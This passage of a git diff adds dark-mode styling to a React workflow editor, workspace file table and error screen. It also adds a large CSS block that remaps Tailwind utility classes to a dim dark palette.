       if (!workflow) return nextEdges;
 
-      const refreshed = applyGraphSemantics(nodes, nextEdges, workflow);
+      const refreshed = applyGraphSemantics(nodes, nextEdges, workflow, edgeTheme);
       setNodes(refreshed.nodes);
       return refreshed.edges;
     });
-  }, [nodes, setEdges, setNodes, workflow]);
+  }, [edgeTheme, nodes, setEdges, setNodes, workflow]);
 
   // 添加新节点
   const handleAddNode = useCallback((type: string) => {
@@ -546,13 +589,13 @@ export default function WorkflowEditor() {
       });
 
       if (!workflow) return updatedEdges;
-      const refreshed = applyGraphSemantics(nodes, updatedEdges, workflow);
+      const refreshed = applyGraphSemantics(nodes, updatedEdges, workflow, edgeTheme);
       setNodes(refreshed.nodes);
       return refreshed.edges;
     });
     setShowEdgePropertyPanel(false);
     setSelectedEdge(null);
-  }, [nodes, setEdges, setNodes, workflow]);
+  }, [edgeTheme, nodes, setEdges, setNodes, workflow]);
 
   // 删除选中的节点或边（键盘事件）
   useEffect(() => {
@@ -573,7 +616,7 @@ export default function WorkflowEditor() {
             const nextEdges = eds.filter((edge) => !edge.selected);
             if (!workflow) return nextEdges;
 
-            const refreshed = applyGraphSemantics(nodes, nextEdges, workflow);
+            const refreshed = applyGraphSemantics(nodes, nextEdges, workflow, edgeTheme);
             setNodes(refreshed.nodes);
             return refreshed.edges;
           });
@@ -595,7 +638,7 @@ export default function WorkflowEditor() {
     return () => {
       document.removeEventListener('keydown', handleKeyDown);
     };
-  }, [nodes, edges, setNodes, setEdges, workflow]);
+  }, [edgeTheme, nodes, edges, setNodes, setEdges, workflow]);
 
   // 自动布局
   const handleAutoLayout = () => {
@@ -613,7 +656,7 @@ export default function WorkflowEditor() {
     }));
 
     const updatedEdges = workflowJson.edges.map((edge, index) =>
-      buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)])
+      buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)], edgeTheme)
     );
 
     setNodes(updatedNodes);
@@ -759,19 +802,19 @@ export default function WorkflowEditor() {
   }
 
   return (
-    <div className="h-screen flex flex-col bg-gray-50">
+    <div className="h-screen flex flex-col bg-gray-50 dark:bg-zinc-950">
       {/* 顶部工具栏 */}
-      <div className="bg-white border-b border-gray-200 px-6 py-4 flex items-center justify-between">
+      <div className="bg-white border-b border-gray-200 px-6 py-4 flex items-center justify-between dark:border-zinc-800 dark:bg-zinc-950">
         <div className="flex items-center gap-4">
           <button
             onClick={() => navigate('/workflows')}
-            className="p-2 hover:bg-gray-100 rounded-lg transition-colors"
+            className="p-2 hover:bg-gray-100 rounded-lg transition-colors dark:text-zinc-300 dark:hover:bg-zinc-800"
           >
             <ArrowLeft className="w-5 h-5" />
           </button>
           <div>
-            <h1 className="text-xl font-semibold text-gray-900">{workflow.name}</h1>
-            <p className="text-sm text-gray-500">{workflow.description || t('editor.noDescription')}</p>
+            <h1 className="text-xl font-semibold text-gray-900 dark:text-zinc-100">{getWorkflowDisplayName(workflow, i18n.language)}</h1>
+            <p className="text-sm text-gray-500 dark:text-zinc-400">{workflow.description || t('editor.noDescription')}</p>
           </div>
           {validationResult && (
             <div className="flex items-center gap-2">
@@ -791,7 +834,7 @@ export default function WorkflowEditor() {
           <button
             onClick={() => setShowNodeToolbar(!showNodeToolbar)}
             className={`flex items-center gap-2 px-4 py-2 border border-gray-300 rounded-lg transition-colors ${
-              showNodeToolbar ? 'bg-red-50 text-red-700 border-red-500' : 'text-gray-700 bg-white hover:bg-gray-50'
+              showNodeToolbar ? 'bg-red-50 text-red-700 border-red-500 dark:bg-red-950/30 dark:text-red-200 dark:border-red-500/40' : 'text-gray-700 bg-white hover:bg-gray-50 dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800'
             }`}
           >
             <Trash2 className="w-4 h-4" />
@@ -799,21 +842,21 @@ export default function WorkflowEditor() {
           </button>
           <button
             onClick={handleAutoLayout}
-            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors"
+            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800"
           >
             <Layout className="w-4 h-4" />
             {t('editor.autoLayout')}
           </button>
           <button
             onClick={handleValidate}
-            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors"
+            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800"
           >
             <CheckCircle className="w-4 h-4" />
             {t('editor.validate')}
           </button>
           <button
             onClick={handleExport}
-            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors"
+            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800"
           >
             <FileJson className="w-4 h-4" />
             {t('editor.export')}
@@ -906,32 +949,33 @@ export default function WorkflowEditor() {
           attributionPosition="bottom-left"
           deleteKeyCode={null}
         >
-          <Background variant={BackgroundVariant.Dots} gap={12} size={1} />
+          <Background variant={BackgroundVariant.Dots} gap={12} size={1} color={isDark ? '#5a6573' : '#e2e8f0'} />
           <Controls />
           <MiniMap
             nodeColor={(node) => {
               return nodeMiniMapColors[node.type as keyof typeof nodeMiniMapColors] ?? '#94a3b8';
             }}
-            style={{ backgroundColor: '#f9fafb' }}
+            maskColor={isDark ? 'rgba(34, 39, 46, 0.72)' : 'rgba(241, 245, 249, 0.68)'}
+            style={{ backgroundColor: isDark ? '#303842' : '#f9fafb' }}
           />
           
           {/* 图例 */}
-          <Panel position="top-left" className="bg-white rounded-lg shadow-lg p-4">
-            <h3 className="text-sm font-semibold text-gray-900 mb-3">{t('editor.nodeTypesLabel')}</h3>
+          <Panel position="top-left" className="bg-white rounded-lg shadow-lg p-4 dark:border dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+            <h3 className="text-sm font-semibold text-gray-900 mb-3 dark:text-zinc-100">{t('editor.nodeTypesLabel')}</h3>
             <div className="space-y-2">
               {Object.entries(nodeColors).map(([type, colors]) => (
                 <div key={type} className="flex items-center gap-2">
                   <div className={`w-4 h-4 rounded border-2 ${colors.border} ${colors.bg}`} />
-                  <span className="text-xs text-gray-700 capitalize">{type}</span>
+                  <span className="text-xs text-gray-700 capitalize dark:text-zinc-300">{type}</span>
                 </div>
               ))}
             </div>
           </Panel>
 
           {/* 统计信息 */}
-          <Panel position="top-right" className="bg-white rounded-lg shadow-lg p-4">
-            <h3 className="text-sm font-semibold text-gray-900 mb-3">{t('editor.statsLabel')}</h3>
-            <div className="space-y-2 text-xs text-gray-600">
+          <Panel position="top-right" className="bg-white rounded-lg shadow-lg p-4 dark:border dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+            <h3 className="text-sm font-semibold text-gray-900 mb-3 dark:text-zinc-100">{t('editor.statsLabel')}</h3>
+            <div className="space-y-2 text-xs text-gray-600 dark:text-zinc-300">
               <div className="flex justify-between gap-4">
                 <span>{t('editor.nodeCountLabel')}</span>
                 <span className="font-medium">{nodes.length}</span>
diff --git a/webui/src/pages/Workspace/index.tsx b/webui/src/pages/Workspace/index.tsx
index 7f20a6652..9d3621e80 100644
--- a/webui/src/pages/Workspace/index.tsx
+++ b/webui/src/pages/Workspace/index.tsx
@@ -373,12 +373,12 @@ function FilesTab() {
             </div>
           ) : (
             <table className="w-full text-sm">
-              <thead className="bg-gray-50 sticky top-0">
+              <thead className="sticky top-0 bg-gray-50 dark:bg-zinc-900/95">
                 <tr>
-                  <th className="text-left px-4 py-2 text-xs font-medium text-gray-500 w-8"></th>
-                  <th className="text-left px-2 py-2 text-xs font-medium text-gray-500">{t('files.columns.name')}</th>
-                  <th className="text-right px-4 py-2 text-xs font-medium text-gray-500 w-24">{t('files.columns.size')}</th>
-                  <th className="text-right px-4 py-2 text-xs font-medium text-gray-500 w-36">{t('files.columns.modified')}</th>
+                  <th className="w-8 px-4 py-2 text-left text-xs font-medium text-gray-500 dark:text-zinc-500"></th>
+                  <th className="px-2 py-2 text-left text-xs font-medium text-gray-500 dark:text-zinc-500">{t('files.columns.name')}</th>
+                  <th className="w-24 px-4 py-2 text-right text-xs font-medium text-gray-500 dark:text-zinc-500">{t('files.columns.size')}</th>
+                  <th className="w-36 px-4 py-2 text-right text-xs font-medium text-gray-500 dark:text-zinc-500">{t('files.columns.modified')}</th>
                   <th className="w-20"></th>
                 </tr>
               </thead>
@@ -388,17 +388,19 @@ function FilesTab() {
                     key={item.path}
                     onClick={() => handleSelectNode(item)}
                     className={`group border-t border-gray-50 cursor-pointer transition-colors ${
-                      panel.node?.path === item.path ? 'bg-slate-100' : 'hover:bg-gray-50'
+                      panel.node?.path === item.path
+                        ? 'bg-slate-100 dark:bg-zinc-800/70'
+                        : 'hover:bg-gray-50 dark:hover:bg-zinc-900/70'
                     }`}
                   >
                     <td className="px-4 py-2 text-sm">{fileIcon(item)}</td>
-                    <td className="px-2 py-2 font-medium text-gray-800 truncate max-w-0">
+                    <td className="max-w-0 truncate px-2 py-2 font-medium text-gray-800 dark:text-zinc-100">
                       <span className="block truncate">{item.name}</span>
                     </td>
-                    <td className="px-4 py-2 text-right text-gray-400 tabular-nums whitespace-nowrap">
+                    <td className="whitespace-nowrap px-4 py-2 text-right tabular-nums text-gray-400 dark:text-zinc-500">
                       {item.type === 'file' ? formatBytes(item.size ?? 0) : '—'}
                     </td>
-                    <td className="px-4 py-2 text-right text-gray-400 text-xs whitespace-nowrap">
+                    <td className="whitespace-nowrap px-4 py-2 text-right text-xs text-gray-400 dark:text-zinc-500">
                       {formatDate(item.modified_at)}
                     </td>
                     <td className="px-2 py-2">
diff --git a/webui/src/routes/index.tsx b/webui/src/routes/index.tsx
index 5414e8016..d3538d4a4 100644
--- a/webui/src/routes/index.tsx
+++ b/webui/src/routes/index.tsx
@@ -65,15 +65,15 @@ export function Routes() {
   if (error) {
     return (
       <AuthLayout>
-        <div className="w-full max-w-lg bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4">
+        <div className="w-full max-w-lg bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4 dark:border-[#4a5563] dark:bg-[#303842] dark:shadow-xl dark:shadow-black/20">
           <div>
-            <h1 className="text-xl font-semibold text-gray-900">{t('error.systemUnknownTitle')}</h1>
-            <p className="text-sm text-gray-500 mt-1">{error}</p>
+            <h1 className="text-xl font-semibold text-gray-900 dark:text-[#d7dee8]">{t('error.systemUnknownTitle')}</h1>
+            <p className="text-sm text-gray-500 mt-1 dark:text-[#b8c2cc]">{error}</p>
           </div>
           <button
             type="button"
             onClick={() => void refresh()}
-            className="bg-slate-900 text-white rounded-lg px-4 py-2 font-medium hover:bg-slate-800"
+            className="bg-slate-900 text-white rounded-lg px-4 py-2 font-medium hover:bg-slate-800 dark:bg-[#46515e] dark:hover:bg-[#5a6573]"
           >
             {t('error.retry')}
           </button>
diff --git a/webui/src/styles/index.css b/webui/src/styles/index.css
index bbb57fd89..00366a553 100644
--- a/webui/src/styles/index.css
+++ b/webui/src/styles/index.css
@@ -4,7 +4,7 @@
 
 @layer base {
   body {
-    @apply bg-gray-50 text-gray-900;
+    @apply bg-gray-50 text-gray-900 dark:bg-zinc-950 dark:text-zinc-100;
   }
 }
 
@@ -192,3 +192,1345 @@
     @apply border-white/20;
   }
 }
+
+/* VS Code / GitHub Dark Dimmed inspired compatibility for existing Tailwind utilities. */
+.dark {
+  --flocks-dark-accent: #539bf5;
+  --flocks-dark-app: #252c35;
+  --flocks-dark-surface: #303842;
+  --flocks-dark-surface-soft: #3a434e;
+  --flocks-dark-surface-raised: #46515e;
+  --flocks-dark-border: #4a5563;
+  --flocks-dark-border-strong: #5a6573;
+  --flocks-dark-text: #d7dee8;
+  --flocks-dark-text-muted: #b8c2cc;
+  --flocks-dark-text-subtle: #9aa7b4;
+  --flocks-dark-placeholder: rgb(184 194 204 / 0.78);
+  --flocks-dark-shadow: 0 18px 48px rgb(28 33 40 / 0.38);
+  background-color: var(--flocks-dark-app);
+  color: var(--flocks-dark-text);
+}
+
+.dark body,
+.dark #root {
+  background-color: var(--flocks-dark-app);
+  color: var(--flocks-dark-text);
+}
+
+.dark ::selection {
+  background-color: rgb(83 155 245 / 0.32);
+  color: #ffffff;
+}
+
+.dark .bg-white,
+.dark .bg-white\/95,
+.dark .bg-white\/90,
+.dark .bg-white\/80,
+.dark .bg-white\/70,
+.dark .bg-white\/60,
+.dark .bg-white\/50,
+.dark .bg-white\/40 {
+  background-color: var(--flocks-dark-surface);
+}
+
+.dark .disabled\:bg-white\/50:disabled {
+  background-color: rgb(48 56 66 / 0.55);
+}
+
+.dark .disabled\:bg-gray-50:disabled,
+.dark .disabled\:bg-zinc-50:disabled,
+.dark .disabled\:bg-slate-50:disabled {
+  background-color: rgb(48 56 66 / 0.62);
+}
+
+.dark .disabled\:bg-gray-200:disabled,
+.dark .disabled\:bg-zinc-200:disabled,
+.dark .disabled\:bg-slate-200:disabled,
+.dark .disabled\:bg-gray-300:disabled,
+.dark .disabled\:bg-zinc-300:disabled,
+.dark .disabled\:bg-slate-300:disabled {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .disabled\:hover\:bg-white:disabled:hover,
+.dark .disabled\:hover\:bg-gray-50:disabled:hover,
+.dark .disabled\:hover\:bg-zinc-50:disabled:hover,
+.dark .disabled\:hover\:bg-slate-50:disabled:hover {
+  background-color: var(--flocks-dark-surface);
+}
+
+.dark .disabled\:text-gray-400:disabled,
+.dark .disabled\:text-zinc-400:disabled,
+.dark .disabled\:text-slate-400:disabled,
+.dark .disabled\:text-gray-500:disabled,
+.dark .disabled\:text-zinc-500:disabled,
+.dark .disabled\:text-slate-500:disabled {
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .disabled\:hover\:text-slate-600:disabled:hover,
+.dark .disabled\:hover\:text-gray-600:disabled:hover,
+.dark .disabled\:hover\:text-zinc-600:disabled:hover {
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .disabled\:border-gray-200:disabled,
+.dark .disabled\:border-zinc-200:disabled,
+.dark .disabled\:border-slate-200:disabled {
+  border-color: var(--flocks-dark-border);
+}
+
+.dark .bg-gray-50,
+.dark .bg-zinc-50,
+.dark .bg-slate-50 {
+  background-color: var(--flocks-dark-app);
+}
+
+.dark .bg-gray-100,
+.dark .bg-zinc-100,
+.dark .bg-slate-100 {
+  background-color: var(--flocks-dark-surface-soft);
+}
+
+.dark .bg-gray-200,
+.dark .bg-zinc-200,
+.dark .bg-slate-200,
+.dark .bg-gray-300,
+.dark .bg-zinc-300 {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .bg-zinc-900,
+.dark .bg-gray-900,
+.dark .bg-slate-900,
+.dark .bg-zinc-950,
+.dark .bg-gray-950,
+.dark .bg-slate-950 {
+  background-color: var(--flocks-dark-surface) !important;
+}
+
+.dark button.bg-slate-700,
+.dark button.bg-slate-800,
+.dark button.bg-slate-900,
+.dark a.bg-slate-700,
+.dark a.bg-slate-800,
+.dark a.bg-slate-900,
+.dark .bg-slate-700.text-white,
+.dark .bg-slate-800.text-white,
+.dark .bg-slate-900.text-white,
+.dark .bg-gray-900.text-white,
+.dark .bg-zinc-800.text-white,
+.dark .bg-zinc-900.text-white {
+  background-color: var(--flocks-dark-surface-raised) !important; /* the generic .dark .bg-*-900 rule is !important; without matching importance it overrides this raised button colour */
+  border-color: var(--flocks-dark-border-strong);
+  color: #ffffff;
+}
+
+.dark button.hover\:bg-slate-800:hover,
+.dark button.hover\:bg-slate-900:hover,
+.dark a.hover\:bg-slate-800:hover,
+.dark a.hover\:bg-slate-900:hover,
+.dark .hover\:bg-slate-800:hover,
+.dark .hover\:bg-slate-900:hover,
+.dark .hover\:bg-gray-900:hover,
+.dark .hover\:bg-zinc-900:hover {
+  background-color: var(--flocks-dark-surface-raised) !important; /* same value as the former #46515e literal; !important so hover is not suppressed on elements whose base .bg-*-900 colour is forced with !important */
+}
+
+.dark pre.bg-gray-900,
+.dark pre.bg-zinc-950,
+.dark code.bg-gray-900,
+.dark code.bg-zinc-950,
+.dark .font-mono.bg-gray-900,
+.dark .font-mono.bg-zinc-950,
+.dark .bg-gray-900.text-green-400,
+.dark .bg-zinc-950.text-green-400,
+.dark .bg-gray-900.text-gray-300,
+.dark .bg-zinc-950.text-zinc-300 {
+  background-color: #20262d !important; /* code/terminal surfaces: every selector here is also hit by the !important generic .bg-gray-900/.bg-zinc-950 rule, so this needs !important to take effect */
+}
+
+.dark .bg-zinc-900\/70,
+.dark .bg-zinc-900\/80,
+.dark .bg-zinc-900\/95 {
+  background-color: rgb(48 56 66 / 0.96);
+}
+
+.dark .bg-zinc-950\/30,
+.dark .bg-zinc-950\/40,
+.dark .bg-zinc-950\/60 {
+  background-color: rgb(37 44 53 / 0.88);
+}
+
+.dark .dark\:bg-zinc-950,
+.dark .dark\:bg-gray-950,
+.dark .dark\:bg-slate-950 {
+  background-color: var(--flocks-dark-app) !important;
+}
+
+.dark .dark\:bg-zinc-950\/95,
+.dark .dark\:bg-gray-950\/95,
+.dark .dark\:bg-slate-950\/95 {
+  background-color: rgb(37 44 53 / 0.96) !important;
+}
+
+.dark .dark\:bg-zinc-900,
+.dark .dark\:bg-gray-900,
+.dark .dark\:bg-slate-900 {
+  background-color: var(--flocks-dark-surface) !important;
+}
+
+.dark .dark\:bg-zinc-900\/60,
+.dark .dark\:bg-zinc-900\/70,
+.dark .dark\:bg-zinc-900\/80,
+.dark .dark\:bg-zinc-900\/95 {
+  background-color: rgb(48 56 66 / 0.96) !important;
+}
+
+.dark .dark\:bg-zinc-800,
+.dark .dark\:bg-gray-800,
+.dark .dark\:bg-slate-800 {
+  background-color: var(--flocks-dark-surface-raised) !important;
+}
+
+.dark .dark\:bg-zinc-800\/50,
+.dark .dark\:bg-zinc-800\/60,
+.dark .dark\:bg-zinc-800\/70,
+.dark .dark\:bg-zinc-800\/80,
+.dark .dark\:bg-gray-800\/50,
+.dark .dark\:bg-gray-800\/60,
+.dark .dark\:bg-gray-800\/70,
+.dark .dark\:bg-gray-800\/80,
+.dark .dark\:bg-slate-800\/50,
+.dark .dark\:bg-slate-800\/60,
+.dark .dark\:bg-slate-800\/70,
+.dark .dark\:bg-slate-800\/80 {
+  background-color: rgb(70 81 94 / 0.72) !important;
+}
+
+.dark .dark\:hover\:bg-zinc-900:hover,
+.dark .dark\:hover\:bg-zinc-800:hover,
+.dark .dark\:hover\:bg-gray-900:hover,
+.dark .dark\:hover\:bg-gray-800:hover,
+.dark .dark\:focus\:bg-zinc-900:focus,
+.dark .dark\:focus\:bg-zinc-800:focus,
+.dark .dark\:focus-within\:bg-zinc-900:focus-within,
+.dark .dark\:focus-within\:bg-zinc-800:focus-within {
+  background-color: var(--flocks-dark-surface-raised) !important;
+}
+
+.dark .dark\:bg-sky-950\/30,
+.dark .dark\:bg-sky-950\/35,
+.dark .dark\:bg-sky-950\/45,
+.dark .dark\:bg-blue-950\/30,
+.dark .dark\:bg-blue-950\/40 {
+  background-color: rgb(83 155 245 / 0.16); /* sky and blue share one translucent blue tint */
+}
+
+.dark .dark\:bg-amber-950\/25,
+.dark .dark\:bg-amber-950\/30,
+.dark .dark\:bg-amber-950\/40,
+.dark .dark\:bg-amber-950\/50,
+.dark .dark\:bg-orange-950\/30,
+.dark .dark\:bg-orange-950\/50,
+.dark .dark\:hover\:bg-amber-900\/60:hover {
+  background-color: rgb(217 119 6 / 0.16); /* the amber hover state uses the same tint as the resting state */
+}
+
+.dark .dark\:bg-red-950\/30,
+.dark .dark\:bg-red-950\/40,
+.dark .dark\:bg-rose-950\/30,
+.dark .dark\:bg-rose-950\/40,
+.dark .dark\:bg-rose-950\/50,
+.dark .dark\:hover\:bg-red-950\/40:hover {
+  background-color: rgb(220 38 38 / 0.14);
+}
+
+.dark .dark\:bg-green-950\/30,
+.dark .dark\:bg-green-950\/40,
+.dark .dark\:bg-teal-950\/30,
+.dark .dark\:bg-teal-950\/40,
+.dark .dark\:bg-cyan-950\/30,
+.dark .dark\:bg-cyan-950\/40 {
+  background-color: rgb(22 163 74 / 0.14); /* NOTE(review): teal and cyan receive the green tint here - confirm intended */
+}
+
+.dark .dark\:bg-purple-950\/30,
+.dark .dark\:bg-purple-950\/40,
+.dark .dark\:bg-violet-950\/30,
+.dark .dark\:bg-violet-950\/40,
+.dark .dark\:bg-indigo-950\/30,
+.dark .dark\:bg-indigo-950\/40 {
+  background-color: rgb(124 58 237 / 0.16); /* purple, violet and indigo share one violet tint */
+}
+
+.dark .hover\:bg-white\/60:hover,
+.dark .hover\:bg-white\/70:hover,
+.dark .hover\:bg-white\/80:hover,
+.dark .hover\:bg-white:hover,
+.dark .hover\:bg-gray-50:hover,
+.dark .hover\:bg-zinc-50:hover,
+.dark .hover\:bg-gray-100:hover,
+.dark .hover\:bg-zinc-100:hover,
+.dark .hover\:bg-gray-200:hover,
+.dark .hover\:bg-gray-200\/60:hover,
+.dark .hover\:bg-zinc-200:hover,
+.dark .hover\:bg-zinc-200\/60:hover,
+.dark .hover\:bg-zinc-100\/70:hover,
+.dark .hover\:bg-slate-50:hover,
+.dark .hover\:bg-slate-100:hover {
+  background-color: var(--flocks-dark-surface-raised); /* light-neutral hover fills become the raised surface; no !important on this rule */
+}
+
+.dark .focus\:bg-white:focus,
+.dark .focus\:bg-gray-200:focus,
+.dark .focus-within\:bg-white:focus-within {
+  background-color: var(--flocks-dark-surface); /* focus states use the base surface rather than the raised one */
+}
+
+.dark .bg-sky-50,
+.dark .bg-sky-50\/80,
+.dark .bg-sky-50\/60,
+.dark .bg-blue-50,
+.dark .bg-blue-50\/40,
+.dark .bg-blue-50\/60 {
+  background-color: rgb(83 155 245 / 0.16); /* pale blue fills become a translucent blue tint */
+}
+
+.dark .bg-amber-50,
+.dark .bg-amber-50\/30,
+.dark .bg-amber-50\/60,
+.dark .bg-amber-50\/70,
+.dark .bg-orange-50,
+.dark .bg-orange-50\/60,
+.dark .bg-yellow-50,
+.dark .bg-yellow-100,
+.dark .bg-yellow-200 {
+  background-color: rgb(217 119 6 / 0.16); /* amber, orange and yellow all share the amber tint */
+}
+
+.dark .bg-red-50,
+.dark .bg-red-50\/30,
+.dark .bg-red-50\/40,
+.dark .bg-red-50\/50,
+.dark .bg-red-100\/80,
+.dark .bg-red-500\/10,
+.dark .bg-red-500\/15,
+.dark .bg-red-600\/5,
+.dark .bg-red-600\/10 {
+  background-color: rgb(220 38 38 / 0.14); /* covers pale reds and low-opacity red-500/600 fills alike */
+}
+
+.dark .bg-green-50,
+.dark .bg-green-50\/50,
+.dark .bg-emerald-50,
+.dark .bg-emerald-50\/50,
+.dark .bg-emerald-500\/15,
+.dark .bg-emerald-100,
+.dark .bg-lime-50 {
+  background-color: rgb(22 163 74 / 0.16);
+}
+
+.dark .bg-gray-50\/60,
+.dark .bg-gray-50\/70,
+.dark .bg-gray-50\/80,
+.dark .bg-zinc-50\/60,
+.dark .bg-zinc-50\/70,
+.dark .bg-slate-50\/70 {
+  background-color: rgb(48 56 66 / 0.76); /* translucent neutral fills keep some transparency (0.76) */
+}
+
+.dark .bg-purple-50,
+.dark .bg-purple-50\/50,
+.dark .bg-purple-50\/60,
+.dark .bg-purple-100,
+.dark .bg-violet-50,
+.dark .bg-violet-100,
+.dark .bg-fuchsia-50,
+.dark .bg-indigo-50,
+.dark .bg-indigo-100 {
+  background-color: rgb(124 58 237 / 0.16);
+}
+
+.dark .bg-teal-50,
+.dark .bg-teal-100,
+.dark .bg-cyan-50,
+.dark .bg-cyan-100 {
+  background-color: rgb(20 184 166 / 0.14); /* teal and cyan get their own teal tint in this rule */
+}
+
+.dark .bg-pink-50,
+.dark .bg-pink-100,
+.dark .bg-rose-50,
+.dark .bg-rose-50\/80,
+.dark .bg-rose-100 {
+  background-color: rgb(244 63 94 / 0.14);
+}
+
+.dark .hover\:bg-sky-50:hover,
+.dark .hover\:bg-blue-50:hover,
+.dark .hover\:bg-blue-50\/30:hover,
+.dark .hover\:bg-blue-50\/40:hover,
+.dark .hover\:bg-sky-100:hover,
+.dark .hover\:bg-blue-100:hover,
+.dark .hover\:bg-amber-50:hover,
+.dark .hover\:bg-amber-50\/30:hover,
+.dark .hover\:bg-orange-50:hover,
+.dark .hover\:bg-yellow-50:hover,
+.dark .hover\:bg-amber-100:hover,
+.dark .hover\:bg-orange-100:hover,
+.dark .hover\:bg-red-50:hover,
+.dark .hover\:bg-red-100:hover,
+.dark .hover\:bg-red-400\/10:hover,
+.dark .hover\:bg-red-500\/20:hover,
+.dark .hover\:bg-red-500\/25:hover,
+.dark .hover\:bg-green-50:hover,
+.dark .hover\:bg-emerald-50:hover,
+.dark .hover\:bg-emerald-50\/80:hover,
+.dark .hover\:bg-emerald-500\/25:hover,
+.dark .hover\:bg-green-100:hover,
+.dark .hover\:bg-yellow-100:hover,
+.dark .hover\:bg-purple-50:hover,
+.dark .hover\:bg-violet-50:hover,
+.dark .hover\:bg-purple-100:hover,
+.dark .hover\:bg-violet-100:hover,
+.dark .hover\:bg-teal-50:hover,
+.dark .hover\:bg-cyan-50:hover,
+.dark .hover\:bg-teal-100:hover,
+.dark .hover\:bg-cyan-100:hover,
+.dark .hover\:bg-indigo-50:hover,
+.dark .hover\:bg-pink-50:hover,
+.dark .hover\:bg-rose-50:hover,
+.dark .hover\:bg-pink-100:hover,
+.dark .hover\:bg-rose-50\/70:hover,
+.dark .hover\:bg-rose-50\/80:hover,
+.dark .hover\:bg-rose-100:hover {
+  background-color: var(--flocks-dark-surface-raised); /* every tinted hover fill collapses to the neutral raised surface, dropping the hue */
+}
+
+.dark .group:hover .group-hover\:bg-sky-100,
+.dark .group:hover .group-hover\:bg-blue-50,
+.dark .group:hover .group-hover\:bg-blue-100,
+.dark .group:hover .group-hover\:bg-emerald-100,
+.dark .group:hover .group-hover\:bg-violet-100,
+.dark .group:hover .group-hover\:bg-zinc-100 {
+  background-color: var(--flocks-dark-surface-raised); /* same treatment when the hover is on a .group ancestor */
+}
+
+.dark .from-white,
+.dark .from-slate-50,
+.dark .from-gray-50,
+.dark .from-zinc-50 {
+  --tw-gradient-from: var(--flocks-dark-surface-soft) var(--tw-gradient-from-position); /* start color plus its position variable */
+  --tw-gradient-to: rgb(58 67 78 / 0) var(--tw-gradient-to-position); /* zero-alpha end color set alongside the start */
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .via-white,
+.dark .via-slate-50,
+.dark .via-gray-50,
+.dark .via-zinc-50 {
+  --tw-gradient-to: rgb(48 56 66 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--flocks-dark-surface) var(--tw-gradient-via-position), var(--tw-gradient-to); /* three-stop list: from, via, to */
+}
+
+.dark .to-white,
+.dark .to-slate-50,
+.dark .to-gray-50,
+.dark .to-zinc-50 {
+  --tw-gradient-to: var(--flocks-dark-surface) var(--tw-gradient-to-position); /* to-* rules only replace the end color */
+}
+
+.dark .from-amber-50,
+.dark .from-orange-50 {
+  --tw-gradient-from: rgb(217 119 6 / 0.18) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(217 119 6 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .via-amber-50,
+.dark .via-orange-50 {
+  --tw-gradient-to: rgb(217 119 6 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), rgb(217 119 6 / 0.16) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-amber-50,
+.dark .to-orange-50,
+.dark .to-yellow-50 {
+  --tw-gradient-to: rgb(217 119 6 / 0.16) var(--tw-gradient-to-position);
+}
+
+.dark .from-emerald-50 {
+  --tw-gradient-from: rgb(22 163 74 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(22 163 74 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .via-teal-50 {
+  --tw-gradient-to: rgb(20 184 166 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), rgb(20 184 166 / 0.14) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-cyan-50 {
+  --tw-gradient-to: rgb(20 184 166 / 0.14) var(--tw-gradient-to-position);
+}
+
+.dark .via-rose-50 {
+  --tw-gradient-to: rgb(220 38 38 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), rgb(220 38 38 / 0.14) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-rose-50 {
+  --tw-gradient-to: rgb(220 38 38 / 0.14) var(--tw-gradient-to-position); /* .to-rose-100 is given this same value in a later rule of this section */
+}
+
+.dark .from-purple-50 {
+  --tw-gradient-from: rgb(124 58 237 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(124 58 237 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .to-purple-50 {
+  --tw-gradient-to: rgb(124 58 237 / 0.16) var(--tw-gradient-to-position);
